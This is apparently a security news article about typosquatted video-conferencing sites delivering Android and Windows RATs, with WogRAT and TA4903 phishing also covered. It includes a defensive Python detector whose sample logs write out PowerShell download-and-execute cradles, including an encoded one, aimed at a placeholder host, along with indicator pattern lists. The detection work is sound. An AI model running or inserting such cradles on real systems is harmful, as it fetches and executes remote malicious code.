Threat actors have been exploiting fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to spread a variety of malware targeting both Android and Windows users since December 2023.
“The threat actor is distributing remote access Trojans (RATs), including SpyNote RAT for Android platforms and NjRAT and DCRat for Windows systems,” Zscaler ThreatLabz researchers said.
The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are relying on typosquatting to lure potential victims into downloading the malware.
They also come with options to download the app for Android, iOS, and Windows platforms. While clicking the Android button downloads an APK file, clicking the Windows app button triggers the download of a batch script.
The malicious batch script is responsible for executing a PowerShell script which, in turn, downloads and executes the remote access trojan.
There is currently no evidence that the threat actor is targeting iOS users, as clicking the iOS app button takes the user to the legitimate Apple App Store listing for Skype.
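The Windows chain described above (a downloaded batch script that launches PowerShell, which in turn fetches and runs the RAT) leaves a recognisable parent/child signature in process-creation telemetry. The following detection logic is an added example, not code from the article or from Zscaler: it scans constructed Sysmon-style process-creation records (pipe-delimited timestamp, parent image, parent command line, image, command line), decodes any `-EncodedCommand` payload so obfuscated cradles are not missed, and flags only cases where a `.bat`/`.cmd` file spawned PowerShell with a download indicator. The hostname `example.invalid`, the file names and the timestamps are all made up.

```python
"""Flag batch-script -> PowerShell download-and-execute chains in process-creation logs."""
import base64
import re
from dataclasses import dataclass

# Indicator sets (lower-case regexes applied to the lower-cased command line).
DOWNLOAD_PATTERNS = [
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"invoke-restmethod", r"\birm\b", r"start-bitstransfer", r"net\.webclient",
]
EXEC_PATTERNS = [r"\biex\b", r"invoke-expression", r"start-process", r"-encodedcommand"]
EVASION_PATTERNS = [r"-w(indowstyle)?\s+hidden", r"-nop\b", r"-noprofile", r"bypass"]

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Constructed sample telemetry (not real data). The fourth record carries an encoded
# payload built here so the base64 is guaranteed to be well-formed.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (IWR http://example.invalid/b.ps1)".encode("utf-16le")).decode()
SAMPLE_LOG = "\n".join([
    "|".join(["2024-03-04T10:01:12Z", CMD, r'cmd.exe /c "C:\Users\alice\Downloads\zoom-setup.bat"', PS,
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/a.ps1')\""]),
    "|".join(["2024-03-04T10:05:40Z", r"C:\Windows\explorer.exe", "explorer.exe", PS,
              "powershell.exe -Command Get-Process"]),
    "|".join(["2024-03-04T10:07:03Z", CMD, "cmd.exe /c build.bat", PS,
              r"powershell.exe -File .\build.ps1"]),
    "|".join(["2024-03-04T10:09:55Z", CMD, r'cmd.exe /c "C:\Temp\skype_install.bat"', PS,
              f"powershell.exe -w hidden -EncodedCommand {ENCODED_PAYLOAD}"]),
])


@dataclass
class Finding:
    timestamp: str
    parent_cmdline: str
    cmdline: str
    indicators: list


def decode_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload (UTF-16LE base64) if one is present."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return cmdline
    return f"{cmdline} [decoded: {decoded}]"


def parse_line(line):
    """Split one pipe-delimited record into a dict; return None for malformed lines."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    return dict(zip(("timestamp", "parent_image", "parent_cmdline", "image", "cmdline"), parts))


def analyze(record):
    """Return a Finding when a .bat/.cmd launched PowerShell with a download cradle."""
    parent_cmd = record["parent_cmdline"].lower()
    if not (record["parent_image"].lower().endswith("cmd.exe")
            and record["image"].lower().endswith("powershell.exe")
            and (".bat" in parent_cmd or ".cmd" in parent_cmd)):
        return None
    cmd = decode_encoded_command(record["cmdline"]).lower()
    hits = [f"{label}:{p}"
            for label, patterns in (("download", DOWNLOAD_PATTERNS),
                                    ("execute", EXEC_PATTERNS),
                                    ("evasion", EVASION_PATTERNS))
            for p in patterns if re.search(p, cmd)]
    # A .bat spawning PowerShell is common in legitimate tooling; require a download indicator.
    if not any(h.startswith("download:") for h in hits):
        return None
    return Finding(record["timestamp"], record["parent_cmdline"], record["cmdline"], hits)


def scan(log_text):
    """Run analyze() over every record and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (f := analyze(rec)):
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.timestamp, f.parent_cmdline, f.indicators)
```

Requiring a download indicator in addition to the `.bat` to PowerShell parent/child relationship keeps build scripts and admin tooling (the third sample record) out of the results, while decoding the encoded command catches the fourth record, which would otherwise show no plain-text cradle.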
“A threat actor is using these decoys to deploy RATs for Android and Windows, which can steal sensitive information, log keystrokes, and steal files,” the researchers said.
The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware called WogRAT, which targets both Windows and Linux, is abusing a free online notepad platform called aNotepad as a covert channel to host and retrieve malicious code.
It is said to have been active since at least the end of 2022, targeting Asian countries such as China, Hong Kong, Japan, and Singapore, among others. That said, it is currently unknown how the malware is distributed in the wild.
“When WogRAT runs for the first time, it collects basic information of the infected system and sends it to the C&C server,” ASEC said. “The malware then supports commands such as executing commands, sending results, downloading files and uploading these files.”
It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal tracked as TA4903 to steal corporate credentials and possibly follow up with Business Email Compromise (BEC) attacks. The adversary has been active since at least 2019, with activity picking up after mid-2023.
“TA4903 regularly conducts spoofing campaigns of various US government entities to steal corporate credentials,” Proofpoint said. “The actor also spoofs organizations in various industries including construction, finance, healthcare, food and beverage, and others.”
Attack chains involve using QR codes (a technique also known as quishing) to phish for credentials and relying on the EvilProxy Adversary-in-the-Middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.
Once the targeted inbox was compromised, the threat actor was observed searching for relevant information on payments, invoices, and banking information, with the ultimate goal of hijacking existing email threads and performing invoice fraud.
Phishing campaigns have also served as a conduit for other malware families such as DarkGate, Agent Tesla, and Remcos RAT, the last of which uses steganography-laden decoys to deploy the malware onto compromised hosts.